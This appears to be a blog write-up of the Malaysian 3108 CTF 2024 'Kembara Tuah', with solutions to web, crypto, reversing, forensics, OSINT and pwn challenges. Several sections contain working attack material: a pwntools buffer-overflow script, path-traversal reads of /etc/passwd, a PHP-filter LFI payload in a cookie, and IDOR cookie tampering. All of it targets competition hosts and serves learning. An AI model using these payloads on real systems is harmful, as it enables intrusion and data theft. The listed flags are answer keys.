3108 CTF 2024 : Kembara Tuah

PreviousDay 14 - Unknown storage NextCTF Tool

Last updated 4 months ago

Trivia Khas Penaja Platinum

RawSEC

Some googling will give you answers.

FLAG: 3108{REMBULAN_UCTATI}

Yayasan Digital Malaysia

FLAG: 3108{jom.digital.by.ydm}

MALAYSIA

3108

FLAG: Ya

Cordini (Misc)

Join the discord server
Go to get-role channel
Click the “purple alien”

Another channel will appear. There is our flag.

FLAG: 3108{kibarkanlah_jalur_gemilang}

Maklum Balas

FLAG: 3108{MalaysiaMadaniJiwaMerdeka}

Kelantan

Sultan Yang Hilang (Web)

Access the URL. We got a list of Sultan Kelantan

View Source, we get a path to "year". /api/v1/sultan/

Silly me, i tried one by one of the year. 1889 got out flag.

https://f2add8dd3a.bahterasiber.my/api/v1/sultan/1889

FLAG: 3108{putera_sulong_Sultan_Ahmad}

Tanpa Nama (RE)

Hint: Modify the opcode

Hint 2: Break @main

array1 = [
    0x65527b88, 0xba80759c, 0xe7aa9e95, 0xe5c7fec2,
    0x8cc5a5de, 0x8f98a784, 0x326e7852, 0x5c844e3f,
    0x8885bd6d, 0xa194
]

array2 = [
    0x2c21160b, 0x584d4237, 0x84796e63, 0x848f9a8f,
    0x58636e79, 0x2c37424d, 0xb1621, 0x2c21160b,
    0x584d4237, 0x6e63
]

result = []
for i in range(len(array1)):
    for j in range(4):
        byte1 = (array1[i] >> (8 * j)) & 0xFF
        byte2 = (array2[i] >> (8 * j)) & 0xFF
        result_byte = (byte1 - byte2) & 0xFF
        result.append(result_byte)

result.reverse()

flag = ''.join(chr(b) for b in result if b != 0)

print(flag)

FLAG: 3108{60c842cb1cae74b7ea8d3c102b33e91e}

Ps: I forgot from where, but this is solution from someone else. I just put it here together for everyone to read and learn. Thank you to the person

Tanpa Nama 2 (RE) ❌

Hint: Check for a reocurring pattern

Hint 2: modify the opcode to the average pattern

FLAG:

No Solution Yet

TERRENGGANU

Privacy matters (Osint)

Tiktok ID: @rockey_smokey1337

Search the ID in Tiktok
Go through some post.
Lead to p3tualang post.
Then, we see comment from rockey_smokey1337 about IG post

Head to IG, and we see a crop photo of or flag... and #kbbsteak.

Tried google on this, lead to Google Review post of our full photo contain our flag.

FLAG: 3108{J4g4_pr1v4cy_4nd4}

Ngaji (Forensic)

Hint: Magic Header

Hint 2: "Tuan Hamba perlu 'dengar', bukan lihat.”

What does it mean by “dengar”? Header? is it not jpeg file? Lets check on it.

Hexeditor Online: https://hexed.it/

After some time searching

fmt - related to wav file. So lets change the header
Header: 52 49 46 8E E3 94 00 57 41 56 45

Now, lets open in Audacity.

Audacity Online: https://wavacity.com/

After hearing to the song, we did hear something. So now lets use spectogram

FLAG: 3108{iLmu_P3n7ing}

Tulisan Jawi (Binary + Linux)

from pwn import *

p = remote('103.28.91.24',10005)
elf = ELF("./jawi")

offset = 40

flag_addr = elf.sym["flag"]

payload = b'A'*offset
payload += p64(0x0000000000401016)
payload += p64(flag_addr)

p.sendline(payload)
p.interactive()

FLAG: 3108{b4tu_b3rsur4t}

Reference:

Ps: Thank you to n3r for the solution sharing.

PAHANG

Sembunyi (Misc)

Attached: rahsia.txt

We got a txt file with whitespace. Just decode it.

Dcode: https://www.dcode.fr/whitespace-language

FLAG: 3108{S3jarah_Ters3mbunyi_P4hang}

Seri Gumum (Web)❌

URL: http://103.28.91.24:8080

/sejarah?tempat=rompin

/sejarah?tempat=kuantan

/sejarah?tempat=bera

Then, we tried LFI. ../../../../etc/passwd

No Solution Yet

Tinggi Mat (Forensik)

Attached: WMT.rar

We check for metadata

zsteg WarisanMerdekaTower.png

So, we got half flag… 3108{th3_t4ll3st

I believe this the password for flag2.rar

Password: MERDEKA118

Decode using Unicode Stega

Unicode: https://330k.github.io/misc_tools/unicode_steganography.html

Thats our another half. _0n3_1n_M4l4ys14!}

FLAG: 3108{th3_t4ll3st_0n3_1n_M4l4ys14!}

Tinggi lagii (Forensik)

Attached: BAngunan.jpg

Make some googling.Google Image

I found Its name is Tradewinds Square Tower

So search about this building led to this information

This building site.
The coordinate

FLAG: 3108{3.15, 101.71}

Merdeka (Web)

Lagu Merdeka

Intercept using Burp Suite.

Then we can see it is using base64. try to decode to confirm.

decode base64 shows the page name.

So now i try encode ../../../../../etc/passwd

Put it in cookie.

Successfully read.

Now, I tried to read php file. But I will use PHP filter php://

After some guessing, we got the right path.

php://filter/read=convert.base64-encode/resource=/var/www/html/config.php

cGhwOi8vZmlsdGVyL3JlYWQ9Y29udmVydC5iYXNlNjQtZW5jb2RlL3Jlc291cmNlPS92YXIvd3d3L2h0bWwvY29uZmlnLnBocA==

FLAG: 3108{m4r1_k1t4_w4rg4_n3g4r4}

Reference:

https://book.hacktricks.xyz/pentesting-web/file-inclusion#php-filter

Kesejarah Kemerdekaan (Network) ❌

No Solution Yet

SELANGOR

Mesej Rahsia (Crypto)

Attached: secretMessenger.py

a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z='j','b','a','c','m','n','i','p','o','q','r','t','x','z','v','s','u','y','h','g','d','e','f','k','l','w'
flag=((3108,"{",p,q,b,p,l,g,l,q,l,v,"_",d,g,h,s,v,k,"_",l,v,m,l,"}")[::-1])

I add print to print the output.

# Variable assignments
a, b, c, d, e, f, g, h, i, j, k, l, m, n, o, p, q, r, s, t, u, v, w, x, y, z = \\
    'j', 'b', 'a', 'c', 'm', 'n', 'i', 'p', 'o', 'q', 'r', 't', 'x', 'z', 'v', 's', 'u', 'y', 'h', 'g', 'd', 'e', 'f', 'k', 'l', 'w'

# Create the flag tuple and reverse it
flag = ((3108, "{", p, q, b, p, l, g, l, q, l, v, "_", d, g, h, s, v, k, "_", l, v, m, l, "}")[::-1])

# Convert the reversed tuple to a string and print it
flag_str = ''.join(map(str, flag))
print(flag_str)

But the result seems to backwards.

So, i mend to not output in backwards

# Variable assignments
a, b, c, d, e, f, g, h, i, j, k, l, m, n, o, p, q, r, s, t, u, v, w, x, y, z = \\
    'j', 'b', 'a', 'c', 'm', 'n', 'i', 'p', 'o', 'q', 'r', 't', 'x', 'z', 'v', 's', 'u', 'y', 'h', 'g', 'd', 'e', 'f', 'k', 'l', 'w'

# Create the flag tuple without reversing
flag = (3108, "{", p, q, b, p, l, g, l, q, l, v, "_", d, g, h, s, v, k, "_", l, v, m, l, "}")

# Convert the tuple to a string and print it
flag_str = ''.join(map(str, flag))
print(flag_str)

FLAG: 3108{substitute_cipher_text}

Tanpa Nama 3 (Crypto)

Attached: cryptochalle.py

Repair the code:

def xor_with_binary(binary_str, xor_str):
    binaries = binary_str.split()
    xor_num = int(xor_str, 2)
    xor_results = []
    for b in binaries:
        num = int(b, 2)
        result_num = num ^ xor_num
        xor_results.append(format(result_num, '08b'))
    return ' '.join(xor_results)

def binary_to_text(binary_str):
    binaries = binary_str.split()
    text = ''.join([chr(int(b, 2)) for b in binaries])
    return text

binary_str = "01010110 01010100 01010101 01011101 00011110 00110110 01010100 00101000 00110101 00101001 01010110 00111010 00100110 00110111 00110101 00111100 00110001 01010101 00111010 00100110 00101101 00100100 00101001 00101001 00100000 00101011 00100010 00100000 00011000"
xor_str = "01100101"

# Perform XOR and convert to text
xor_output = xor_with_binary(binary_str, xor_str)
decoded_text = binary_to_text(xor_output)

# Output the decoded text
print("Decoded text:", decoded_text)

FLAG: 3108{S1MPL3_CRPYT0_CHALLENGE}

Selangorku (Web)

We curl the url

curl https://6654c734cc.bahterasiber.my/

#!/bin/bash

# Base URL
base_url="<https://6654c734cc.bahterasiber.my>"

# List of paths
paths=(
  "/hulu_langat.html"
  "/klang.html"
  "/kuala_langat.html"
  "/kuala_selangor.html"
  "/petaling.html"
  "/sabak_bernam.html"
  "/sepang.html"
  "/gombak.html"
  "/hulu_selangor.html"
)

# Loop through each path and make a curl request
for path in "${paths[@]}"; do
  # Fetch the URL, filter for "3108", remove spaces and newlines
  curl -s "${base_url}${path}" | grep "3108" | tr -d '[:space:]'
done

chmod + x selangorku.sh
./selangorku.sh

FLAG: 3108{S3lang0r_temp4t_kelahiran_ku}

Selangorku V2 (Web)

https://1b267619c4.bahterasiber.my/

Same as Selangorku. But this time it got more when you curl into /hulu_langat/ and all the “tempat”

#!/bin/bash

# Base URL
base_url="<https://1b267619c4.bahterasiber.my>"

# List of paths (directories)
paths=(
  "/hulu_langat/"
  "/klang/"
  "/kuala_langat/"
  "/petaling/"
  "/kuala_selangor/"
  "/sabak_bernam/"
  "/sepang/"
  "/gombak/"
  "/hulu_selangor/"
)

# Loop through each path
for path in "${paths[@]}"; do
  # Fetch the content of the directory or index page
  content=$(curl -s "${base_url}${path}")

  # Extract all .html links
  html_links=$(echo "$content" | grep -oP '(?<=href=")[^"]+\\.html')

  # Loop through each .html link found
  for link in $html_links; do
    # Construct the full URL
    full_url="${base_url}${path}${link}"

    # Curl the full URL and search for the pattern "3108{flag}"
    result=$(curl -s "$full_url" | grep -oP "3108{[^}]+}")

    # If the pattern is found, print the result
    if [[ -n "$result" ]]; then
      echo "Result"
      echo "Path: $full_url"
      echo "Flag: $result"
    fi
  done
done

FLAG: 3108{D1_s1ni_t3mp4t_S4ya_m3mb3s4r}

Selangor Tourism (Reversing) ❌

Hint 1: Namakan semula file

Hint 2: pestudio

No Solution Yet

Arkib Digital (Web)

https://d9e9c0bd29.bahterasiber.my

Hint: ada yang tersembunyi di dalam arkib

We found script.js in view source

“arkib” word is the hint.

/arkib.php will get this in response. Together with Base64.

Decode the based64 in Decoder.

FLAG: 3018{f1b1d922b8af1b7187b9a8f68b888ac44b6f9182269e74cb56fd3e92d9a714f5}

Pintu gerbang (Web) ❌

https://4219844b4c.bahterasiber.my

Found script.js in view-source

var _0x5deaf3=_0x4390;(function(_0x3ec5ae,_0x971b41){var _0x383ab5=_0x4390,_0x186466=_0x3ec5ae();while(!![]){try{var _0x49850d=-parseInt(_0x383ab5(0xff))/0x1+-parseInt(_0x383ab5(0xf0))/0x2+parseInt(_0x383ab5(0xf2))/0x3*(-parseInt(_0x383ab5(0xf9))/0x4)+-parseInt(_0x383ab5(0xf1))/0x5+parseInt(_0x383ab5(0xf6))/0x6+-parseInt(_0x383ab5(0xf7))/0x7+parseInt(_0x383ab5(0xe5))/0x8*(parseInt(_0x383ab5(0xeb))/0x9);if(_0x49850d===_0x971b41)break;else _0x186466['push'](_0x186466['shift']());}catch(_0x2ccc1e){_0x186466['push'](_0x186466['shift']());}}}(_0x3155,0x22b59));function getSessionPath(){var _0x83474e=_0x4390;return _0x83474e(0xf5);}function getGateKey(){var _0x2ffb13=_0x4390,_0x2b91fb=new XMLHttpRequest();_0x2b91fb['open'](_0x2ffb13(0xe7),_0x2ffb13(0xf4),!![]),_0x2b91fb[_0x2ffb13(0xfc)](_0x2ffb13(0xe6),'application/x-www-form-urlencoded'),_0x2b91fb[_0x2ffb13(0xe8)]=function(){var _0x215b46=_0x2ffb13;_0x2b91fb[_0x215b46(0xec)]!==0xc8&&console['log'](_0x215b46(0xfd));},_0x2b91fb['send']();}function computeHash(_0xb75b35){var _0x42d35e=_0x4390,_0x1220c3=0x0;for(var _0x2b6c7e=0x0;_0x2b6c7e<_0xb75b35[_0x42d35e(0x102)];_0x2b6c7e++){_0x1220c3+=_0xb75b35[_0x42d35e(0xfe)](_0x2b6c7e)*0x3%0x100;}return console['log'](_0x42d35e(0xe9),_0x1220c3),_0x1220c3;}function simulateDelay(_0x40a570){setTimeout(function(){var _0x54f190=_0x4390;console[_0x54f190(0xf8)](_0x54f190(0xfa)),typeof _0x40a570==='function'&&_0x40a570();},0x5dc);}function generateRandomData(_0x47dd6b){var _0x59fd4a=_0x4390,_0x19f7a7=[];for(var _0x3607e4=0x0;_0x3607e4<_0x47dd6b;_0x3607e4++){_0x19f7a7[_0x59fd4a(0x101)](Math[_0x59fd4a(0xef)](_0x3607e4)*0x64);}return console[_0x59fd4a(0xf8)]('Generated\\x20Data:',_0x19f7a7),_0x19f7a7;}function calculateSquare(_0x43e352){var _0x23551f=Math['pow'](_0x43e352,0x2);return console['log']('Calculated\\x20Square:',_0x23551f),_0x23551f;}function obfuscateString(_0x4bbcb7){var _0x7ea55a=_0x4390,_0x184307=_0x4bbcb7[_0x7ea55a(0x100)]('')['reverse']()[_0x7ea55a(0xee)]('');return console[_0x7ea55a(0xf8)](_0x7ea55a(0xfb),_0x184307),_0x184307;}computeHash(_0x5deaf3(0xf3)),simulateDelay(function(){var _0x327c0a=_0x5deaf3;console['log'](_0x327c0a(0xea));}),generateRandomData(0xf),calculateSquare(0xa),obfuscateString('complexity'),getGateKey();function _0x3155(){var _0x16552d=['length','16JOQhzV','Content-Type','POST','onload','Computed\\x20Hash:','Callback\\x20from\\x20simulateDelay','1783962WUGaRA','status','shift','join','sin','161348jmqDPA','30560mOkTJY','261FVoBpD','exampleInput','/maklumat_kunci.php','/s3N4r4I_kunc1.txt','1276416ZfCPdV','1413755luiuCd','log','3564MyKJfp','Delay\\x20Simulation\\x20Completed','Obfuscated\\x20String:','setRequestHeader','Kunci\\x20tidak\\x20disediakan\\x20atau\\x20tidak\\x20sah!','charCodeAt','100735IwYsIA','split','push'];_0x3155=function(){return _0x16552d;};return _0x3155();}function _0x4390(_0x53a517,_0x524d79){var _0x31558c=_0x3155();return _0x4390=function(_0x43906c,_0x5a0f21){_0x43906c=_0x43906c-0xe5;var _0x43d2e2=_0x31558c[_0x43906c];return _0x43d2e2;},_0x4390(_0x53a517,_0x524d79);}function getCookie(_0x322a62){var _0x27961c=_0x5deaf3,_0x59fc67=';\\x20'+document['cookie'],_0x16c81d=_0x59fc67[_0x27961c(0x100)](';\\x20'+_0x322a62+'=');if(_0x16c81d[_0x27961c(0x102)]==0x2)return _0x16c81d['pop']()['split'](';')[_0x27961c(0xed)]();}

Do some cleaning

function getSessionPath() {
  return '/s3N4r4I_kunc1.txt';
}

function getGateKey() {
  var xhr = new XMLHttpRequest();
  xhr.open('POST', '/maklumat_kunci.php', true);
  xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
  xhr.onload = function() {
    if (xhr.status !== 200) console.log('Kunci tidak disediakan atau tidak sah!');
  };
  xhr.send();
}

function computeHash(str) {
  var hash = 0;
  for (var i = 0; i < str.length; i++) {
    hash += str.charCodeAt(i) * 3 % 256;
  }
  console.log('Computed Hash:', hash);
  return hash;
}

function simulateDelay(callback) {
  setTimeout(function() {
    console.log('Delay Simulation Completed');
    if (typeof callback === 'function') callback();
  }, 1500);
}

function generateRandomData(length) {
  var data = [];
  for (var i = 0; i < length; i++) {
    data.push(Math.sin(i) * 100);
  }
  console.log('Generated Data:', data);
  return data;
}

function calculateSquare(num) {
  var square = Math.pow(num, 2);
  console.log('Calculated Square:', square);
  return square;
}

function obfuscateString(str) {
  var obfuscated = str.split('').reverse().join('');
  console.log('Obfuscated String:', obfuscated);
  return obfuscated;
}

computeHash(getSessionPath());
simulateDelay(function() {
  console.log('Callback from simulateDelay');
});
generateRandomData(15);
calculateSquare(10);
obfuscateString('complexity');
getGateKey();

/s3N4r4I_kunc1.txt

kunci=a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 kunci=b5a1d2e3c4f6e7a8b9c0d1e2f3a4b5c6 kunci=c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6 kunci=d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7 kunci=e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8 kunci=f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9 kunci=a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d0 kunci=b6c7d8e9f0a1b2c3d4e5f6a7b8c9d0e1 kunci=c7d8e9f0a1b2c3d4e5f6a7b8c9d0e1f2 kunci=d8e9f0a1b2c3d4e5f6a7b8c9d0e1f2a3 kunci=e9f0a1b2c3d4e5f6a7b8c9d0e1f2a3b4 kunci=f0a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5 kunci=a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 kunci=b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7 kunci=c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8 kunci=d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9 kunci=e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0 kunci=f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1 kunci=a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2 kunci=b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3 kunci=c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4 kunci=d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5 kunci=e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6 kunci=f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7 kunci=a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8 kunci=b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9 kunci=c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0 kunci=d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1 kunci=e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2 kunci=f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3 kunci=a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4 kunci=b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5 kunci=a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 kunci=b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7 kunci=c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8 kunci=d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9 kunci=e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0 kunci=f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1 kunci=a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2 kunci=b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3 kunci=c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4 kunci=d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5 kunci=e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6 kunci=f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7 kunci=a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8 kunci=b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9 kunci=c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0 kunci=d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1 kunci=7c2d6e8a1b1c8e4e6f1b5a5e1a2c8b7d kunci=e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8 kunci=f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9 kunci=a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d0 kunci=b6c7d8e9f0a1b2c3d4e5f6a7b8c9d0e1 kunci=c7d8e9f0a1b2c3d4e5f6a7b8c9d0e1f2 kunci=d8e9f0a1b2c3d4e5f6a7b8c9d0e1f2a3 kunci=d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5 kunci=e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6 kunci=f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7 kunci=a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8 kunci=b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9 kunci=b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9 kunci=c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0 kunci=d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1 kunci=e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2 kunci=f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3 kunci=a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4 kunci=a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6

/maklumat_kunci.php

No Solution Yet

NEGERI SEMBILAN

Jauh Bono Umohnyo (Misc)

777 33 6 22 2 88_6 666 7777 8_9 2 66 8 33 3

Look like phone keypad.

FLAG: 3108{REMBAU_MOST_WANTED}

Sejarah N9 (Crypto + Misc)

2097119120211115191514712116114

FLAG: 3108{TIGASATUKOSONGLAPAN}

Sambungan Telefon (Misc)

741456369 321478963 1478965456321 258 7415963 36987 7412369654 7415963 321478965 741456369 321478963 1478965456321 258 7415963

Lets use Cipher Identifier in Dcode. Its detect as Numeric Keypad Draw

Cipher Identifier: https://www.dcode.fr/cipher-identifier

Numeric Keypad Draw: https://www.dcode.fr/numeric-keypad-draw

FLAG: 3108{HOBINJANGHOBIN}

MELAKA

Perigi (Osint)

Attached: flag.rar

We do some googling and found

Perigi Hang Li Po
Racun second time by Belanda

Reference: https://www.melakahariini.my/perigi-lambang-cinta-raja/

I use Belanda as a password to open the flag.rar

unrar e flag.rar

FLAG: 3108{th3_k1ngs_w3ll_st4ys_0n}

Pahlawan Lagenda (Forensic)

FLAG: 3108{gr3p_15_@w3s0m3_l4ks4m4n4}

Hang Tak Tidur Lagi (Web)

https://fc9044a5b6.bahterasiber.my/

View Source and we found this:

tuah:tuah

Hm..

The hint “Pembesar empat lain”

Bendahara, Penghulu Bendahari, Temenggung dan Laksamana.

We see above pic the “Laksamana” is highlighted.

We also see that there is cookie “role”

Decode: JRAUWU2BJVAU4QI%3D

URL Decode —> Base 32 we got Laksamana.

Now lets try do the same for another 3 Pembesar

Bendahara - IJSW4ZDBNBQXEYI%3D

Temenggung - KRSW2ZLOM5TXK3TH

Penghulu Bendahari - KBSW4Z3IOVWHKICCMVXGIYLIMFZGS%3D%3D%3D

FLAG: 3108{1d0R_s4nGa7l4h_Bah4y4!}

Ilmu Hisab (RE) ❌

Attached: perhintungan

No Solution Yet

Car Fire (Crypto) ❌

Attached: 5.png

No Solution Yet

Berenang Ke Tepian (RE) ❌

No Solution Yet

JOHOR

zZzZz (Web + Crypto)

Decode

0x33z0x31z0x30z0x380x7bz0x37z0x30z0x30z0x650x66z0x34z0x61z0x37z0x39z0x39z0x350x39z0x360x31z0x350x62z0x360x37z0x650x61z0x35z0x32z0x39z0x37z0x65z0x37z0x32z0x350x63z0x300x36z0x65z0x7dz

FLAG: 3108{700ef4a79959615b67ea5297e725c06e}

Kekacauan Huruf (Crypto)

I just ask ChatGPT to decode this. Here is the provided script.

from Crypto.Util.number import bytes_to_long, long_to_bytes

# Given values from secret_key.txt
secret_key = [54, 38, 12, 47, 37, 37, 53, 22, 6, 38, 62, 22, 10, 54, 19, 41, 43, 53, 0, 62, 63, 28, 63, 63, 22, 10, 7, 37, 63, 53, 44, 8, 10, 42, 35, 43, 42, 63, 37, 21, 4, 19, 45, 21, 19, 18, 3, 62, 53, 24, 2, 62, 18, 35, 41, 14, 53, 3, 37, 63, 55, 62, 5]
offset = 50
padding_length = 9
original_order = [9, 20, 6, 12, 22, 38, 14, 24, 53, 52, 61, 29, 45, 11, 57, 44, 8, 46, 55, 59, 31, 2, 51, 43, 21, 27, 17, 40, 15, 58, 0, 26, 19, 36, 60, 28, 48, 39, 34, 50, 7, 16, 56, 30, 10, 49, 13, 3, 5, 42, 41, 47, 37, 4, 32, 33, 62, 1, 18, 23, 25, 35, 54]
q = 64

# Step 1: Reverse the offset addition
adjusted_secret_key = [(x - offset) % q for x in secret_key]

# Step 2: Reverse the shuffling
reordered_secret_key = [0] * len(adjusted_secret_key)
for i, index in enumerate(original_order):
    reordered_secret_key[index] = adjusted_secret_key[i]

# Step 3: Convert to integer
flag_int = 0
for value in reversed(reordered_secret_key):
    flag_int = (flag_int * q) + value

# Step 4: Remove padding
flag_int >>= (padding_length * 8)

# Step 5: Convert integer back to bytes
flag_bytes = long_to_bytes(flag_int)
print("Flag:", flag_bytes.decode())

FLAG: 3108{9546880676d3788377699aad794c5a44}

Malayan Union (OSINT)

Attached: malayanunion.jpeg

https://www.youtube.com/watch?v=rrBCZSnjCgo

Scroll in the comment, we see some base64.

aHR0cHM6Ly91ZmlsZS5pby9jYmRvdzF2MQo=

https://ufile.io/cbdow1v1

We get another jpg file

https://hexed.it/

So we repair using FF D8 FF for JPEG file.

Now the image can be open.

We do Google Image search. And found a place name

FLAG: 3108{Istana_Besar_Johor}

Kapla Harimau Selatan (Web)

This is the main page of the website.

View Page Source is revealing something.

By revealing the reveal.txt, We found base64 in the code.

We decode it.

Upon searching, we found words Gangganu.

Since the code is all about header. We make a custom header in burp.

I add this two as stated in reveal.txt

Origin:https://127.0.0.1 X-Custom-Header: Gangganu

And Send Request. Ta daa we get our flag in response.

curl -s -H "Origin: [<https://127.0.0.1>](<https://127.0.0.1/>)" -H "X-Custom-Header: Gangganu"  <https://8303a1befe.bahterasiber.my/> | grep "3108"

FLAG: 3108{d941697cea9e3f34186780b68416961}

Perak

Kontras (Forensic)

Attached: Sejarah_Ringkas.pdf

FLAG: 3108{Peghak_Darul_ridzuAn}

Pandak Lam (Crypto)

Snxgbe craragnatna Qngb Znunenwn Yryn Zratnzovy unx zrathgvc phxnv. 24Whynv1875 Ovepu zrznxfn Fhygna Noqhyynu zranaqngnatnav cratvflgvunena lnat zrzobyruxna Oevgvfu zratnzovy unx zrathgvc phxnv. Fhygna Noqhyynu qvhthg nxna qvghehaxna gnxugn wvxn rattna zranaqngnatnav cratvflgvunena grefrohg. Ovepu zrzonxne ehznu Enwn Atnu Benat Orfne Crenx xrenan zrarehfxna xhgvcna phxnv qv Ovqbe. Zrapnone Xrghnana Zrynlh. Xrznenuna Fhygna qna crzorfne Crenx zrzhapnx cnqn 2Bxgbore1875. Fhygna Noqhyynu qvcnxfn zranaqngnatnav fheng cralrenuna xhnfn xrcnqn Oevgvfu. Xhnfn zragnqove artrev qvfrenuxna xrcnqn Erfvqra lnat orexhnfn zrynagvx unxvz, zrathehfxna phxnv qna zrynagvx cratuhyh. Zrzcrexranyxna Phxnv Oneh Ovepu oregvaqnx frfhxn ungv qratna zrzcrexranyxna phxnv oneh frcregv phxnv cnqv, crenuh ngnc, frawngn qna onlnena crezvg haghx zrzonynx. 3108x3o4atx1gnac4uy4j4a Frgvnc vfv ehznu creyh zrzonlne 2Qbyne frontnv phxnv xrynzva. Zrapnohyv Nqng Erfnz Ovepu qvorapv byru fhygna qna crzorfne-crzorfne Crenx ncnovyn zratunenzxna fvfgrz creunzonna lnat zrawnqv nqng erfnz Zrynlh Ovepu fratnwn zravzohyxna xrznenuna benat Zrynlh qratna zralvzcna unzon-unzon crerzchna qv ehznualn.na zralvzcna unzon-unzon crerzchna qv ehznualn.

I just decode the text with ROT13 and search for flag 3108

FLAG: 3108{k3b4ngk1tanp4hl4w4n}

Penang

Bawang (Web + Osint)

tmdjl5kyfzimrsrkkjisxybwb7664epxizxfz6hbivkg6k4a3x2svrad

Open in Tor browser (because the hint is Bawang)

URL: http://tmdjl5kyfzimrsrkkjisxybwb7664epxizxfz6hbivkg6k4a3x2svrad.onion

View source to get the username & password

Username: bawang

Password: bWVtYmF3YW5namVrZWpl

Decode using cyber chef

Password: membawangjekeje

5°24'35.8"N 100°19'41.4"E 5°25'11.7"N 100°19'57.1"E 5°24'49.0"N 100°18'46.9"E

Search in google maps will take us to all the Mamak. Let read the Google Review.

There is our flag in Nasi Kandar Line Clear

FLAG: 3108{surrr_punya_tobat_jumpa}

Mamu Kasi Tau (Misc)

Attached: mamu_kasi_tau.mp3

Open in https://wavacity.com/ (online Audacity)

Reverse the audio.

or may use below script speech2text.py

import argparse
from pydub import AudioSegment
import speech_recognition as sr
import os

def convert_to_wav(input_file, output_file):
    # Load the input audio file (MP3 or WAV) and convert it to WAV
    audio = AudioSegment.from_file(input_file)
    audio.export(output_file, format="wav")

def reverse_wav(input_file, output_file):
    # Load the WAV file
    audio = AudioSegment.from_wav(input_file)
    
    # Reverse the audio
    reversed_audio = audio.reverse()
    
    # Save the reversed audio to a new file
    reversed_audio.export(output_file, format="wav")

def convert_speech_to_text(wav_file, language='ms'):
    recognizer = sr.Recognizer()
    
    # Load the WAV file
    with sr.AudioFile(wav_file) as source:
        # Record the audio
        audio_data = recognizer.record(source)
        
        # Recognize speech using Google Web Speech API
        try:
            text = recognizer.recognize_google(audio_data, language=language)
            return text
        except sr.UnknownValueError:
            return "Speech Recognition could not understand audio"
        except sr.RequestError as e:
            return f"Could not request results; {e}"

def main():
    # Set up argument parser
    parser = argparse.ArgumentParser(description="Reverse an audio file (WAV or MP3) and convert Malay speech to text.")
    parser.add_argument('input_file', type=str, help="Path to the input audio file (WAV or MP3)")
    args = parser.parse_args()
    
    input_file = args.input_file
    base_name, ext = os.path.splitext(input_file)
    
    if ext.lower() not in ['.wav', '.mp3']:
        print("Unsupported file format. Please provide a WAV or MP3 file.")
        return

    # Temporary WAV file for processing
    temp_wav = base_name + '_temp.wav'
    reversed_wav = base_name + '_reversed.wav'
    
    # Convert MP3 to WAV if needed
    if ext.lower() == '.mp3':
        convert_to_wav(input_file, temp_wav)
    else:
        temp_wav = input_file

    # Reverse the WAV file
    try:
        reverse_wav(temp_wav, reversed_wav)
    except Exception as e:
        print(f"Error reversing audio file: {e}")
        return
    
    # Convert the reversed WAV file to text with Malay language
    text = convert_speech_to_text(reversed_wav, language='ms')
    
    print("Transcribed Text:")
    print(text)
    
    # Clean up temporary files
    if ext.lower() == '.mp3':
        os.remove(temp_wav)
    os.remove(reversed_wav)

if __name__ == "__main__":
    main()

FLAG: 3108{peningtelinga}

Pangkalan (Network)

Open in Wireshark

Follow tcp for port 55663

go through till “Stream 13”

3108{mikealphalimabravoalphatangotango}

This is NATO Phonetic Alphabet. We take out only the first letter.

Reference: https://www.worldometers.info/languages/nato-phonetic-alphabet/

FLAG: 3108{malbatt}

